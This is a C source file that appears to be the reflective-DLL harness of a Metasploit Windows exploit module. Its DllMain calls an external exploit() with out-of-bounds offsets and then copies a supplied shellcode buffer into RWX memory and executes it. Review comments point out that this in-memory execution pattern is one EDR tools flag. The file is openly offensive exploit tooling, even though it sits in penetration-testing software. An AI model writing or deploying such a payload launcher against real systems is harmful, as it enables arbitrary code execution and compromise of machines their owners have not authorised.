#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "ReflectiveLoader.c"

#include <stdio.h>
#include <windows.h>

int exploit(unsigned int xleft_offset, unsigned int oob_offset);

/*
 * Parameter block handed to DllMain via lpReserved (see beginexploit).
 * Layout must match what the module side packs; the reflective loader
 * does not validate it.  NOTE(review): _MSF_PAYLOAD is a reserved
 * identifier (leading underscore + uppercase) — harmless on MSVC, but
 * technically implementation-owned.
 */
typedef struct _MSF_PAYLOAD {
  DWORD  dwxLeftOffset;        /* forwarded unchanged as exploit()'s xleft_offset */
  DWORD  dwOOBOffset;          /* forwarded unchanged as exploit()'s oob_offset */
  DWORD  dwSize;               /* byte count copied out of cPayloadData by runpayload();
                                  never checked against sizeof cPayloadData */
  CHAR  cPayloadData[0x1000];  /* fixed-size payload buffer; bytes beyond dwSize are ignored */
} MSF_PAYLOAD;
typedef MSF_PAYLOAD* PMSF_PAYLOAD;

/*
 * Copy `size` bytes from `payload` into a fresh RWX region and transfer
 * control to it.
 *
 * Returns -1 if VirtualAlloc fails, 0 if the payload returns.  The region is
 * committed PAGE_EXECUTE_READWRITE and is never released — a single
 * RWX allocation immediately followed by a memcpy and an indirect call is the
 * textbook in-memory execution pattern that memory scanners and EDR hooks on
 * VirtualAlloc flag.  `size` is trusted as given; the caller owns bounding it.
 */
int executepayload(void * payload, size_t size)
{
  void (*entry)(void);
  LPVOID region = VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

  if (region == NULL) {
    return -1;
  }

  memcpy(region, payload, size);
  entry = (void (*)(void))region;
  entry();
  return 0;
}

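/*
 * Execute the payload carried inside an MSF_PAYLOAD block.
 *
 * Returns -1 if pMsfPayload is NULL or dwSize exceeds the embedded buffer,
 * otherwise whatever executepayload() returns.  The size check is new: the
 * original forwarded dwSize unchecked, so a malformed block (dwSize > 0x1000)
 * made executepayload() read past the end of cPayloadData.
 */
int runpayload(PMSF_PAYLOAD pMsfPayload)
{
  if (!pMsfPayload) {
    return -1;
  }
  /* dwSize arrives from outside this module; clamp it to the fixed buffer
     so memcpy in executepayload() cannot over-read the struct. */
  if (pMsfPayload->dwSize > sizeof pMsfPayload->cPayloadData) {
    return -1;
  }
  return executepayload(pMsfPayload->cPayloadData, pMsfPayload->dwSize);
}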

/*
 * Entry called from DllMain on DLL_PROCESS_ATTACH.  lpReserved is
 * reinterpreted as a PMSF_PAYLOAD and dereferenced without a NULL check —
 * a missing block crashes the host process rather than failing quietly.
 * exploit() is defined elsewhere; a zero return is treated as success and
 * only then is the embedded payload run.
 */
void beginexploit(LPVOID lpReserved) 
{
  PMSF_PAYLOAD block = (PMSF_PAYLOAD)lpReserved;
  int rc = exploit(block->dwxLeftOffset, block->dwOOBOffset);

  if (rc != 0) {
    return;   /* exploit() reported failure: do not run the payload */
  }
  runpayload(block);
}

/*
 * Custom DllMain for the reflective loader (REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN).
 *
 * DLL_QUERY_HMODULE records the module handle in hAppInstance (owned by
 * ReflectiveLoader.c) and, when lpReserved is non-NULL, writes it back to
 * the caller.  DLL_PROCESS_ATTACH records the handle and starts the exploit
 * with lpReserved as its parameter block.  Every other reason, including the
 * loader-specific DLL_METASPLOIT_ATTACH, is a no-op.  Always returns TRUE.
 */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
  if (dwReason == DLL_QUERY_HMODULE) {
    hAppInstance = hinstDLL;
    if (lpReserved != NULL) {
      /* hand the module handle back through the caller-supplied slot */
      *(HMODULE*)lpReserved = hAppInstance;
    }
  } else if (dwReason == DLL_PROCESS_ATTACH) {
    hAppInstance = hinstDLL;
    beginexploit(lpReserved);
  }
  /* DLL_METASPLOIT_ATTACH, DLL_PROCESS_DETACH, DLL_THREAD_ATTACH,
     DLL_THREAD_DETACH: nothing to do. */
  return TRUE;
}